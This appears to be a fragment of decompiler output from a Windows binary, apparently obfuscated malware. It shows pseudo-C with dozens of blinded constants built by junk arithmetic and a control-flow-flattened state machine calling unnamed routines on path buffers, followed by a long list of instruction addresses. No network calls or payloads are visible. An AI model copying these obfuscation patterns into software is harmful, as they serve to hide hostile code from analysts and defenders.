                                                                                                                                                                                                                    				_v1640 = _v1640 + 0x2d59;
                                                                                                                                                                                                                    				_v1640 = _v1640 + 0xea4d;
                                                                                                                                                                                                                    				_v1640 = _v1640 ^ 0x003115cd;
                                                                                                                                                                                                                    				_v1616 = 0x5b70bb;
                                                                                                                                                                                                                    				_v1616 = _v1616 + 0xfee7;
                                                                                                                                                                                                                    				_v1616 = _v1616 | 0xe6fc3f27;
                                                                                                                                                                                                                    				_v1616 = _v1616 ^ 0xe6feeb83;
                                                                                                                                                                                                                    				_v1732 = 0xa88db6;
                                                                                                                                                                                                                    				_v1732 = _v1732 + 0xffff2c96;
                                                                                                                                                                                                                    				_v1732 = _v1732 / _t531;
                                                                                                                                                                                                                    				_v1732 = _v1732 << 0xe;
                                                                                                                                                                                                                    				_v1732 = _v1732 ^ 0xbc5cb88a;
                                                                                                                                                                                                                    				_v1700 = 0x93c4d7;
                                                                                                                                                                                                                    				_v1700 = _v1700 << 6;
                                                                                                                                                                                                                    				_v1700 = _v1700 << 8;
                                                                                                                                                                                                                    				_v1700 = _v1700 ^ 0xf1315603;
                                                                                                                                                                                                                    				_v1740 = 0x343269;
                                                                                                                                                                                                                    				_v1740 = _v1740 >> 7;
                                                                                                                                                                                                                    				_v1740 = _v1740 + 0xb4c6;
                                                                                                                                                                                                                    				_t532 = 0x41;
                                                                                                                                                                                                                    				_v1740 = _v1740 / _t532;
                                                                                                                                                                                                                    				_v1740 = _v1740 ^ 0x000f53be;
                                                                                                                                                                                                                    				_v1708 = 0x15a2f7;
                                                                                                                                                                                                                    				_v1708 = _v1708 | 0xc2ddb5a6;
                                                                                                                                                                                                                    				_v1708 = _v1708 + 0xffff84da;
                                                                                                                                                                                                                    				_v1708 = _v1708 ^ 0xc2d4dd2f;
                                                                                                                                                                                                                    				_v1660 = 0x6812d6;
                                                                                                                                                                                                                    				_v1660 = _v1660 << 0xa;
                                                                                                                                                                                                                    				_v1660 = _v1660 + 0xffff562f;
                                                                                                                                                                                                                    				_v1660 = _v1660 ^ 0xa04a8386;
                                                                                                                                                                                                                    				_v1604 = 0xfb55f5;
                                                                                                                                                                                                                    				_v1604 = _v1604 << 0xd;
                                                                                                                                                                                                                    				_v1604 = _v1604 ^ 0x6ab2ddce;
                                                                                                                                                                                                                    				_v1624 = 0x90639;
                                                                                                                                                                                                                    				_v1624 = _v1624 >> 0x10;
                                                                                                                                                                                                                    				_v1624 = _v1624 ^ 0xd76c5c89;
                                                                                                                                                                                                                    				_v1624 = _v1624 ^ 0xd7687b4f;
                                                                                                                                                                                                                    				_v1692 = 0x97e57b;
                                                                                                                                                                                                                    				_v1692 = _v1692 >> 0xe;
                                                                                                                                                                                                                    				_v1692 = _v1692 ^ 0x61351408;
                                                                                                                                                                                                                    				_v1692 = _v1692 ^ 0x613d6d21;
                                                                                                                                                                                                                    				_v1716 = 0xa91e84;
                                                                                                                                                                                                                    				_v1716 = _v1716 + 0xf2e3;
                                                                                                                                                                                                                    				_v1716 = _v1716 + 0xeaf6;
                                                                                                                                                                                                                    				_t533 = 0x3f;
                                                                                                                                                                                                                    				_v1716 = _v1716 * 0x78;
                                                                                                                                                                                                                    				_v1716 = _v1716 ^ 0x502a5c1a;
                                                                                                                                                                                                                    				_v1724 = 0x9708b8;
                                                                                                                                                                                                                    				_v1724 = _v1724 ^ 0x97717db4;
                                                                                                                                                                                                                    				_v1724 = _v1724 | 0x0d594dba;
                                                                                                                                                                                                                    				_v1724 = _v1724 + 0xffff1b30;
                                                                                                                                                                                                                    				_v1724 = _v1724 ^ 0x9fff92e0;
                                                                                                                                                                                                                    				_v1752 = 0x63be6a;
                                                                                                                                                                                                                    				_v1752 = _v1752 | 0x9b04d567;
                                                                                                                                                                                                                    				_v1752 = _v1752 << 0xe;
                                                                                                                                                                                                                    				_v1752 = _v1752 + 0xffff2007;
                                                                                                                                                                                                                    				_v1752 = _v1752 ^ 0xffd95abf;
                                                                                                                                                                                                                    				_v1584 = 0x38fd37;
                                                                                                                                                                                                                    				_v1584 = _v1584 + 0x8f2c;
                                                                                                                                                                                                                    				_v1584 = _v1584 ^ 0x003d1d10;
                                                                                                                                                                                                                    				_v1672 = 0x1d419b;
                                                                                                                                                                                                                    				_v1672 = _v1672 * 0x1d;
                                                                                                                                                                                                                    				_v1672 = _v1672 >> 7;
                                                                                                                                                                                                                    				_v1672 = _v1672 ^ 0x000a3e65;
                                                                                                                                                                                                                    				_v1600 = 0x50a0b1;
                                                                                                                                                                                                                    				_v1600 = _v1600 / _t533;
                                                                                                                                                                                                                    				_v1600 = _v1600 ^ 0x000ad50a;
                                                                                                                                                                                                                    				_v1648 = 0xe71e8f;
                                                                                                                                                                                                                    				_v1648 = _v1648 >> 0x10;
                                                                                                                                                                                                                    				_v1648 = _v1648 + 0x65b0;
                                                                                                                                                                                                                    				_v1648 = _v1648 ^ 0x00088b40;
                                                                                                                                                                                                                    				_v1632 = 0xc8ab8;
                                                                                                                                                                                                                    				_v1632 = _v1632 + 0xffff6fbb;
                                                                                                                                                                                                                    				_v1632 = _v1632 << 6;
                                                                                                                                                                                                                    				_v1632 = _v1632 ^ 0x02f4d688;
                                                                                                                                                                                                                    				_v1656 = 0x71c037;
                                                                                                                                                                                                                    				_v1656 = _v1656 * 0x2a;
                                                                                                                                                                                                                    				_v1656 = _v1656 * 0x69;
                                                                                                                                                                                                                    				_v1656 = _v1656 ^ 0xa782398b;
                                                                                                                                                                                                                    				_v1772 = 0x37c6d2;
                                                                                                                                                                                                                    				_v1772 = _v1772 << 0xe;
                                                                                                                                                                                                                    				_v1772 = _v1772 + 0x8ec0;
                                                                                                                                                                                                                    				_v1772 = _v1772 + 0xffff6937;
                                                                                                                                                                                                                    				_v1772 = _v1772 ^ 0xf1bf203a;
                                                                                                                                                                                                                    				_v1612 = 0x3dddcb;
                                                                                                                                                                                                                    				_t534 = 0x76;
                                                                                                                                                                                                                    				_v1612 = _v1612 / _t534;
                                                                                                                                                                                                                    				_t535 = 0x65;
                                                                                                                                                                                                                    				_v1612 = _v1612 / _t535;
                                                                                                                                                                                                                    				_v1612 = _v1612 ^ 0x0005e0cd;
                                                                                                                                                                                                                    				_v1712 = 0x26252e;
                                                                                                                                                                                                                    				_v1712 = _v1712 + 0xd43f;
                                                                                                                                                                                                                    				_v1712 = _v1712 | 0x8cb3f94a;
                                                                                                                                                                                                                    				_v1712 = _v1712 ^ 0x8cbb36c9;
                                                                                                                                                                                                                    				_v1620 = 0xe3695a;
                                                                                                                                                                                                                    				_v1620 = _v1620 + 0xffff28e5;
                                                                                                                                                                                                                    				_v1620 = _v1620 >> 3;
                                                                                                                                                                                                                    				_v1620 = _v1620 ^ 0x001d84bb;
                                                                                                                                                                                                                    				_v1776 = 0xf510c9;
                                                                                                                                                                                                                    				_v1776 = _v1776 >> 5;
                                                                                                                                                                                                                    				_v1776 = _v1776 << 7;
                                                                                                                                                                                                                    				_v1776 = _v1776 << 4;
                                                                                                                                                                                                                    				_v1776 = _v1776 ^ 0x3d4ddaa2;
                                                                                                                                                                                                                    				_v1580 = 0x26c5b7;
                                                                                                                                                                                                                    				_v1580 = _v1580 ^ 0x1be37f68;
                                                                                                                                                                                                                    				_v1580 = _v1580 ^ 0x1bcc0edc;
                                                                                                                                                                                                                    				_v1764 = 0x383e3e;
                                                                                                                                                                                                                    				_v1764 = _v1764 + 0xbfef;
                                                                                                                                                                                                                    				_v1764 = _v1764 >> 5;
                                                                                                                                                                                                                    				_v1764 = _v1764 + 0xffff2acd;
                                                                                                                                                                                                                    				_v1764 = _v1764 ^ 0x000ce1a5;
                                                                                                                                                                                                                    				_v1592 = 0x8c2044;
                                                                                                                                                                                                                    				_t536 = 0x2e;
                                                                                                                                                                                                                    				_v1592 = _v1592 * 0x13;
                                                                                                                                                                                                                    				_v1592 = _v1592 ^ 0x0a6f620b;
                                                                                                                                                                                                                    				_v1596 = 0x39ba98;
                                                                                                                                                                                                                    				_v1596 = _v1596 << 3;
                                                                                                                                                                                                                    				_v1596 = _v1596 ^ 0x01c27042;
                                                                                                                                                                                                                    				_v1768 = 0x51264b;
                                                                                                                                                                                                                    				_v1768 = _v1768 << 0xa;
                                                                                                                                                                                                                    				_v1768 = _v1768 << 1;
                                                                                                                                                                                                                    				_v1768 = _v1768 + 0xffff290e;
                                                                                                                                                                                                                    				_v1768 = _v1768 ^ 0x893a362d;
                                                                                                                                                                                                                    				_v1664 = 0x2c9585;
                                                                                                                                                                                                                    				_v1664 = _v1664 >> 3;
                                                                                                                                                                                                                    				_v1664 = _v1664 * 0x3f;
                                                                                                                                                                                                                    				_v1664 = _v1664 ^ 0x015e5137;
                                                                                                                                                                                                                    				_v1744 = 0x717e6f;
                                                                                                                                                                                                                    				_v1744 = _v1744 | 0x3a52cc84;
                                                                                                                                                                                                                    				_v1744 = _v1744 << 0xf;
                                                                                                                                                                                                                    				_v1744 = _v1744 ^ 0xa79e6ec5;
                                                                                                                                                                                                                    				_v1744 = _v1744 ^ 0x58e10a5b;
                                                                                                                                                                                                                    				_v1688 = 0xa62eb9;
                                                                                                                                                                                                                    				_v1688 = _v1688 + 0x3a9f;
                                                                                                                                                                                                                    				_v1688 = _v1688 >> 5;
                                                                                                                                                                                                                    				_v1688 = _v1688 ^ 0x0004b60e;
                                                                                                                                                                                                                    				_v1644 = 0x67be12;
                                                                                                                                                                                                                    				_v1644 = _v1644 + 0x10e0;
                                                                                                                                                                                                                    				_v1644 = _v1644 + 0xec1e;
                                                                                                                                                                                                                    				_v1644 = _v1644 ^ 0x0061b817;
                                                                                                                                                                                                                    				_v1652 = 0x26a06e;
                                                                                                                                                                                                                    				_v1652 = _v1652 / _t536;
                                                                                                                                                                                                                    				_v1652 = _v1652 | 0x2dcb424b;
                                                                                                                                                                                                                    				_v1652 = _v1652 ^ 0x2dcd07e4;
                                                                                                                                                                                                                    				_v1704 = 0xe815e0;
                                                                                                                                                                                                                    				_t537 = 0x29;
                                                                                                                                                                                                                    				_t526 = _v1576;
                                                                                                                                                                                                                    				_v1704 = _v1704 * 0x32;
                                                                                                                                                                                                                    				_v1704 = _v1704 + 0xffff13fa;
                                                                                                                                                                                                                    				_v1704 = _v1704 ^ 0x2d5f9860;
                                                                                                                                                                                                                    				_v1608 = 0xf305e5;
                                                                                                                                                                                                                    				_v1608 = _v1608 << 2;
                                                                                                                                                                                                                    				_v1608 = _v1608 ^ 0x03cc5bba;
                                                                                                                                                                                                                    				_v1728 = 0x75a581;
                                                                                                                                                                                                                    				_v1728 = _v1728 + 0xffff9c3a;
                                                                                                                                                                                                                    				_v1728 = _v1728 | 0xe3a71ae1;
                                                                                                                                                                                                                    				_v1728 = _v1728 + 0x3c96;
                                                                                                                                                                                                                    				_v1728 = _v1728 ^ 0xe3fb2b17;
                                                                                                                                                                                                                    				_v1668 = 0xb3da28;
                                                                                                                                                                                                                    				_v1668 = _v1668 | 0xe49777f0;
                                                                                                                                                                                                                    				_v1668 = _v1668 * 0x3c;
                                                                                                                                                                                                                    				_v1668 = _v1668 ^ 0x9b1ade73;
                                                                                                                                                                                                                    				_v1676 = 0xd4b8c6;
                                                                                                                                                                                                                    				_v1676 = _v1676 ^ 0xf119f4f9;
                                                                                                                                                                                                                    				_v1676 = _v1676 + 0xffff2a00;
                                                                                                                                                                                                                    				_v1676 = _v1676 ^ 0xf1c17b00;
                                                                                                                                                                                                                    				_v1684 = 0xeb3880;
                                                                                                                                                                                                                    				_v1684 = _v1684 / _t537;
                                                                                                                                                                                                                    				_v1684 = _v1684 + 0x26fc;
                                                                                                                                                                                                                    				_v1684 = _v1684 ^ 0x0003a70b;
                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                    					_t538 = 0x5c;
                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                    						L2:
                                                                                                                                                                                                                    						_t504 = 0xdc8006b;
                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                    							L3:
                                                                                                                                                                                                                    							if(_t586 == 0x36f727f) {
                                                                                                                                                                                                                    								_push(_v1616);
                                                                                                                                                                                                                    								_push(_v1640);
                                                                                                                                                                                                                    								_push(_v1756);
                                                                                                                                                                                                                    								_t505 = E00A81E60(0xa6111c, _v1748, __eflags);
                                                                                                                                                                                                                    								E00A67582( &_v520, __eflags);
                                                                                                                                                                                                                    								__eflags =  *0xa83b38 + 0x21c;
                                                                                                                                                                                                                    								E00A7DCF9(_v1732,  *0xa83b38 + 0x21c, _t505, _v1700,  *0xa83b38 + 0x21c, _v1740, _v1708,  &_v520, 0x104,  &_v1040,  &_v1560, _v1660, _v1604, _v1624);
                                                                                                                                                                                                                    								E00A7D6DF(_v1692, _t505, _v1716, _v1724);
                                                                                                                                                                                                                    								_t591 =  &(_t591[0x11]);
                                                                                                                                                                                                                    								_t586 = 0xbcf62a5;
                                                                                                                                                                                                                    								goto L17;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t586 == 0x6c9afb7) {
                                                                                                                                                                                                                    									_push(_v1600);
                                                                                                                                                                                                                    									_push(_v1672);
                                                                                                                                                                                                                    									_push(_v1584);
                                                                                                                                                                                                                    									__eflags = E00A71031(_v1648, _v1588, _v1632, 0xa6114c, _v1656, _v1772, _v1612,  &_v1572, _v1712, _v1620, _v1776, 0xa6114c, 0xa6114c, _v1580, 0xa6114c, 0xa6114c, _v1720, E00A81E60(0xa6114c, _v1752, __eflags));
                                                                                                                                                                                                                    									_t586 =  ==  ? 0xdc8006b : 0x2928772;
                                                                                                                                                                                                                    									E00A7D6DF(_v1764, _t514, _v1592, _v1596);
                                                                                                                                                                                                                    									_t591 =  &(_t591[0x15]);
                                                                                                                                                                                                                    									L17:
                                                                                                                                                                                                                    									_t504 = 0xdc8006b;
                                                                                                                                                                                                                    									_t538 = 0x5c;
                                                                                                                                                                                                                    									goto L18;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									if(_t586 == 0x903316a) {
                                                                                                                                                                                                                    										_t427 =  &_v1680; // 0xa3e65
                                                                                                                                                                                                                    										E00A7E4D8(_v1628, _v1736, _t538, _t538, _v1760, _t538,  *_t427,  &_v1040, _v1636);
                                                                                                                                                                                                                    										_t591 =  &(_t591[7]);
                                                                                                                                                                                                                    										_t586 = 0x36f727f;
                                                                                                                                                                                                                    										goto L1;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										if(_t586 == 0xbcf62a5) {
                                                                                                                                                                                                                    											_t528 =  *0xa83b38 + 0xc;
                                                                                                                                                                                                                    											while(1) {
                                                                                                                                                                                                                    												__eflags =  *_t528 - _t538;
                                                                                                                                                                                                                    												if(__eflags == 0) {
                                                                                                                                                                                                                    													break;
                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                    												_t528 = _t528 + 2;
                                                                                                                                                                                                                    												__eflags = _t528;
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    											_t526 = _t528 + 2;
                                                                                                                                                                                                                    											_t586 = 0x6c9afb7;
                                                                                                                                                                                                                    											goto L2;
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											if(_t586 == 0xcbff410) {
                                                                                                                                                                                                                    												E00A7B133(_v1668, _v1676, _v1572, _v1684);
                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                    												if(_t586 != _t504) {
                                                                                                                                                                                                                    													goto L18;
                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                    													_t407 =  &_v1744; // 0x58e10a5b
                                                                                                                                                                                                                    													_t523 = E00A6E325( &_v1560, _v1768, _v1664,  *_t407);
                                                                                                                                                                                                                    													_pop(_t553);
                                                                                                                                                                                                                    													_t525 = E00A75E1B(_v1688, _v1644, _v1696, _v1652, 2 + _t523 * 2, _v1704, _t526, _v1608,  &_v1560, _t553, _v1728, _v1572);
                                                                                                                                                                                                                    													_t591 =  &(_t591[0xa]);
                                                                                                                                                                                                                    													_t586 = 0xcbff410;
                                                                                                                                                                                                                    													_v1576 = 0 | _t525 == 0x00000000;
                                                                                                                                                                                                                    													while(1) {
                                                                                                                                                                                                                    														L1:
                                                                                                                                                                                                                    														_t538 = 0x5c;
                                                                                                                                                                                                                    														L2:
                                                                                                                                                                                                                    														_t504 = 0xdc8006b;
                                                                                                                                                                                                                    														goto L3;
                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							L21:
                                                                                                                                                                                                                    							return _v1576;
                                                                                                                                                                                                                    							L18:
                                                                                                                                                                                                                    							__eflags = _t586 - 0x2928772;
                                                                                                                                                                                                                    						} while (__eflags != 0);
                                                                                                                                                                                                                    						goto L21;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    			}















































































                                                                                                                                                                                                                    0x00a668f2
                                                                                                                                                                                                                    0x00a668f8
                                                                                                                                                                                                                    0x00a66905
                                                                                                                                                                                                                    0x00a6690e
                                                                                                                                                                                                                    0x00a66916
                                                                                                                                                                                                                    0x00a6691e
                                                                                                                                                                                                                    0x00a66926
                                                                                                                                                                                                                    0x00a6692e
                                                                                                                                                                                                                    0x00a66936
                                                                                                                                                                                                                    0x00a6693e
                                                                                                                                                                                                                    0x00a66946
                                                                                                                                                                                                                    0x00a6694e
                                                                                                                                                                                                                    0x00a66956
                                                                                                                                                                                                                    0x00a66961
                                                                                                                                                                                                                    0x00a6696c
                                                                                                                                                                                                                    0x00a66977
                                                                                                                                                                                                                    0x00a6697f
                                                                                                                                                                                                                    0x00a66987
                                                                                                                                                                                                                    0x00a6698c
                                                                                                                                                                                                                    0x00a66994
                                                                                                                                                                                                                    0x00a6699f
                                                                                                                                                                                                                    0x00a669b2
                                                                                                                                                                                                                    0x00a669b9
                                                                                                                                                                                                                    0x00a669be
                                                                                                                                                                                                                    0x00a669c6
                                                                                                                                                                                                                    0x00a669d1
                                                                                                                                                                                                                    0x00a669d9
                                                                                                                                                                                                                    0x00a669e1
                                                                                                                                                                                                                    0x00a669e6
                                                                                                                                                                                                                    0x00a669ee
                                                                                                                                                                                                                    0x00a669f6
                                                                                                                                                                                                                    0x00a669fe
                                                                                                                                                                                                                    0x00a66a09
                                                                                                                                                                                                                    0x00a66a0e
                                                                                                                                                                                                                    0x00a66a14
                                                                                                                                                                                                                    0x00a66a1c
                                                                                                                                                                                                                    0x00a66a24
                                                                                                                                                                                                                    0x00a66a36
                                                                                                                                                                                                                    0x00a66a3b
                                                                                                                                                                                                                    0x00a66a44
                                                                                                                                                                                                                    0x00a66a4f
                                                                                                                                                                                                                    0x00a66a5a
                                                                                                                                                                                                                    0x00a66a62
                                                                                                                                                                                                                    0x00a66a6a
                                                                                                                                                                                                                    0x00a66a72
                                                                                                                                                                                                                    0x00a66a77
                                                                                                                                                                                                                    0x00a66a7f
                                                                                                                                                                                                                    0x00a66a8c
                                                                                                                                                                                                                    0x00a66a8d
                                                                                                                                                                                                                    0x00a66a91
                                                                                                                                                                                                                    0x00a66a9e
                                                                                                                                                                                                                    0x00a66aa2
                                                                                                                                                                                                                    0x00a66aaa
                                                                                                                                                                                                                    0x00a66ab5
                                                                                                                                                                                                                    0x00a66ac0
                                                                                                                                                                                                                    0x00a66acb
                                                                                                                                                                                                                    0x00a66ad6
                                                                                                                                                                                                                    0x00a66ae1
                                                                                                                                                                                                                    0x00a66aec
                                                                                                                                                                                                                    0x00a66af7
                                                                                                                                                                                                                    0x00a66b02
                                                                                                                                                                                                                    0x00a66b0a
                                                                                                                                                                                                                    0x00a66b18
                                                                                                                                                                                                                    0x00a66b1e
                                                                                                                                                                                                                    0x00a66b23
                                                                                                                                                                                                                    0x00a66b2b
                                                                                                                                                                                                                    0x00a66b33
                                                                                                                                                                                                                    0x00a66b38
                                                                                                                                                                                                                    0x00a66b3d
                                                                                                                                                                                                                    0x00a66b45
                                                                                                                                                                                                                    0x00a66b4d
                                                                                                                                                                                                                    0x00a66b52
                                                                                                                                                                                                                    0x00a66b60
                                                                                                                                                                                                                    0x00a66b65
                                                                                                                                                                                                                    0x00a66b6b
                                                                                                                                                                                                                    0x00a66b73
                                                                                                                                                                                                                    0x00a66b7b
                                                                                                                                                                                                                    0x00a66b83
                                                                                                                                                                                                                    0x00a66b8b
                                                                                                                                                                                                                    0x00a66b93
                                                                                                                                                                                                                    0x00a66b9e
                                                                                                                                                                                                                    0x00a66ba6
                                                                                                                                                                                                                    0x00a66bb1
                                                                                                                                                                                                                    0x00a66bbc
                                                                                                                                                                                                                    0x00a66bc7
                                                                                                                                                                                                                    0x00a66bcf
                                                                                                                                                                                                                    0x00a66bda
                                                                                                                                                                                                                    0x00a66be5
                                                                                                                                                                                                                    0x00a66bed
                                                                                                                                                                                                                    0x00a66bf8
                                                                                                                                                                                                                    0x00a66c03
                                                                                                                                                                                                                    0x00a66c0b
                                                                                                                                                                                                                    0x00a66c10
                                                                                                                                                                                                                    0x00a66c18
                                                                                                                                                                                                                    0x00a66c20
                                                                                                                                                                                                                    0x00a66c28
                                                                                                                                                                                                                    0x00a66c30
                                                                                                                                                                                                                    0x00a66c3d
                                                                                                                                                                                                                    0x00a66c3e
                                                                                                                                                                                                                    0x00a66c42
                                                                                                                                                                                                                    0x00a66c4a
                                                                                                                                                                                                                    0x00a66c52
                                                                                                                                                                                                                    0x00a66c5a
                                                                                                                                                                                                                    0x00a66c62
                                                                                                                                                                                                                    0x00a66c6a
                                                                                                                                                                                                                    0x00a66c72
                                                                                                                                                                                                                    0x00a66c7a
                                                                                                                                                                                                                    0x00a66c82
                                                                                                                                                                                                                    0x00a66c87
                                                                                                                                                                                                                    0x00a66c8f
                                                                                                                                                                                                                    0x00a66c97
                                                                                                                                                                                                                    0x00a66ca2
                                                                                                                                                                                                                    0x00a66cad
                                                                                                                                                                                                                    0x00a66cb8
                                                                                                                                                                                                                    0x00a66cc5
                                                                                                                                                                                                                    0x00a66cc9
                                                                                                                                                                                                                    0x00a66cce
                                                                                                                                                                                                                    0x00a66cd6
                                                                                                                                                                                                                    0x00a66cea
                                                                                                                                                                                                                    0x00a66cf1
                                                                                                                                                                                                                    0x00a66cfc
                                                                                                                                                                                                                    0x00a66d07
                                                                                                                                                                                                                    0x00a66d0f
                                                                                                                                                                                                                    0x00a66d1a
                                                                                                                                                                                                                    0x00a66d25
                                                                                                                                                                                                                    0x00a66d30
                                                                                                                                                                                                                    0x00a66d3b
                                                                                                                                                                                                                    0x00a66d43
                                                                                                                                                                                                                    0x00a66d4e
                                                                                                                                                                                                                    0x00a66d61
                                                                                                                                                                                                                    0x00a66d70
                                                                                                                                                                                                                    0x00a66d77
                                                                                                                                                                                                                    0x00a66d84
                                                                                                                                                                                                                    0x00a66d8c
                                                                                                                                                                                                                    0x00a66d91
                                                                                                                                                                                                                    0x00a66d99
                                                                                                                                                                                                                    0x00a66da1
                                                                                                                                                                                                                    0x00a66da9
                                                                                                                                                                                                                    0x00a66dbd
                                                                                                                                                                                                                    0x00a66dc2
                                                                                                                                                                                                                    0x00a66dd2
                                                                                                                                                                                                                    0x00a66dd7
                                                                                                                                                                                                                    0x00a66de0
                                                                                                                                                                                                                    0x00a66deb
                                                                                                                                                                                                                    0x00a66df3
                                                                                                                                                                                                                    0x00a66dfb
                                                                                                                                                                                                                    0x00a66e03
                                                                                                                                                                                                                    0x00a66e0b
                                                                                                                                                                                                                    0x00a66e16
                                                                                                                                                                                                                    0x00a66e21
                                                                                                                                                                                                                    0x00a66e29
                                                                                                                                                                                                                    0x00a66e34
                                                                                                                                                                                                                    0x00a66e3c
                                                                                                                                                                                                                    0x00a66e41
                                                                                                                                                                                                                    0x00a66e46
                                                                                                                                                                                                                    0x00a66e4b
                                                                                                                                                                                                                    0x00a66e53
                                                                                                                                                                                                                    0x00a66e5e
                                                                                                                                                                                                                    0x00a66e69
                                                                                                                                                                                                                    0x00a66e74
                                                                                                                                                                                                                    0x00a66e7c
                                                                                                                                                                                                                    0x00a66e84
                                                                                                                                                                                                                    0x00a66e89
                                                                                                                                                                                                                    0x00a66e91
                                                                                                                                                                                                                    0x00a66e99
                                                                                                                                                                                                                    0x00a66eac
                                                                                                                                                                                                                    0x00a66ead
                                                                                                                                                                                                                    0x00a66eb4
                                                                                                                                                                                                                    0x00a66ebf
                                                                                                                                                                                                                    0x00a66eca
                                                                                                                                                                                                                    0x00a66ed2
                                                                                                                                                                                                                    0x00a66edd
                                                                                                                                                                                                                    0x00a66ee5
                                                                                                                                                                                                                    0x00a66eea
                                                                                                                                                                                                                    0x00a66eee
                                                                                                                                                                                                                    0x00a66ef6
                                                                                                                                                                                                                    0x00a66efe
                                                                                                                                                                                                                    0x00a66f09
                                                                                                                                                                                                                    0x00a66f19
                                                                                                                                                                                                                    0x00a66f20
                                                                                                                                                                                                                    0x00a66f2b
                                                                                                                                                                                                                    0x00a66f33
                                                                                                                                                                                                                    0x00a66f3b
                                                                                                                                                                                                                    0x00a66f40
                                                                                                                                                                                                                    0x00a66f48
                                                                                                                                                                                                                    0x00a66f50
                                                                                                                                                                                                                    0x00a66f58
                                                                                                                                                                                                                    0x00a66f60
                                                                                                                                                                                                                    0x00a66f65
                                                                                                                                                                                                                    0x00a66f6d
                                                                                                                                                                                                                    0x00a66f78
                                                                                                                                                                                                                    0x00a66f83
                                                                                                                                                                                                                    0x00a66f8e
                                                                                                                                                                                                                    0x00a66f99
                                                                                                                                                                                                                    0x00a66fad
                                                                                                                                                                                                                    0x00a66fb4
                                                                                                                                                                                                                    0x00a66fbf
                                                                                                                                                                                                                    0x00a66fca
                                                                                                                                                                                                                    0x00a66fdb
                                                                                                                                                                                                                    0x00a66fdc
                                                                                                                                                                                                                    0x00a66fe8
                                                                                                                                                                                                                    0x00a66fec
                                                                                                                                                                                                                    0x00a66ff4
                                                                                                                                                                                                                    0x00a66ffc
                                                                                                                                                                                                                    0x00a67007
                                                                                                                                                                                                                    0x00a6700f
                                                                                                                                                                                                                    0x00a6701a
                                                                                                                                                                                                                    0x00a67022
                                                                                                                                                                                                                    0x00a6702a
                                                                                                                                                                                                                    0x00a67032
                                                                                                                                                                                                                    0x00a6703a
                                                                                                                                                                                                                    0x00a67042
                                                                                                                                                                                                                    0x00a6704a
                                                                                                                                                                                                                    0x00a67057
                                                                                                                                                                                                                    0x00a6705b
                                                                                                                                                                                                                    0x00a67063
                                                                                                                                                                                                                    0x00a6706b
                                                                                                                                                                                                                    0x00a67073
                                                                                                                                                                                                                    0x00a6707b
                                                                                                                                                                                                                    0x00a67083
                                                                                                                                                                                                                    0x00a67091
                                                                                                                                                                                                                    0x00a67095
                                                                                                                                                                                                                    0x00a6709d
                                                                                                                                                                                                                    0x00a670a5
                                                                                                                                                                                                                    0x00a670a5
                                                                                                                                                                                                                    0x00a670a7
                                                                                                                                                                                                                    0x00a670a8
                                                                                                                                                                                                                    0x00a670a8
                                                                                                                                                                                                                    0x00a670a8
                                                                                                                                                                                                                    0x00a670ad
                                                                                                                                                                                                                    0x00a670ad
                                                                                                                                                                                                                    0x00a670b3
                                                                                                                                                                                                                    0x00a6726b
                                                                                                                                                                                                                    0x00a67277
                                                                                                                                                                                                                    0x00a6727e
                                                                                                                                                                                                                    0x00a67286
                                                                                                                                                                                                                    0x00a67294
                                                                                                                                                                                                                    0x00a672d8
                                                                                                                                                                                                                    0x00a672f3
                                                                                                                                                                                                                    0x00a6730f
                                                                                                                                                                                                                    0x00a67314
                                                                                                                                                                                                                    0x00a67317
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a670b9
                                                                                                                                                                                                                    0x00a670bb
                                                                                                                                                                                                                    0x00a671c2
                                                                                                                                                                                                                    0x00a671ce
                                                                                                                                                                                                                    0x00a671d2
                                                                                                                                                                                                                    0x00a67242
                                                                                                                                                                                                                    0x00a6725b
                                                                                                                                                                                                                    0x00a6725e
                                                                                                                                                                                                                    0x00a67263
                                                                                                                                                                                                                    0x00a6731c
                                                                                                                                                                                                                    0x00a6731e
                                                                                                                                                                                                                    0x00a67323
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a670c1
                                                                                                                                                                                                                    0x00a670c7
                                                                                                                                                                                                                    0x00a6719a
                                                                                                                                                                                                                    0x00a671b0
                                                                                                                                                                                                                    0x00a671b5
                                                                                                                                                                                                                    0x00a671b8
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a670cd
                                                                                                                                                                                                                    0x00a670d3
                                                                                                                                                                                                                    0x00a67174
                                                                                                                                                                                                                    0x00a6717c
                                                                                                                                                                                                                    0x00a6717c
                                                                                                                                                                                                                    0x00a6717f
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a67179
                                                                                                                                                                                                                    0x00a67179
                                                                                                                                                                                                                    0x00a67179
                                                                                                                                                                                                                    0x00a67181
                                                                                                                                                                                                                    0x00a67184
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a670d9
                                                                                                                                                                                                                    0x00a670df
                                                                                                                                                                                                                    0x00a67348
                                                                                                                                                                                                                    0x00a670e5
                                                                                                                                                                                                                    0x00a670e7
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a670ed
                                                                                                                                                                                                                    0x00a670ed
                                                                                                                                                                                                                    0x00a67103
                                                                                                                                                                                                                    0x00a67109
                                                                                                                                                                                                                    0x00a6714e
                                                                                                                                                                                                                    0x00a67155
                                                                                                                                                                                                                    0x00a6715a
                                                                                                                                                                                                                    0x00a67162
                                                                                                                                                                                                                    0x00a670a5
                                                                                                                                                                                                                    0x00a670a5
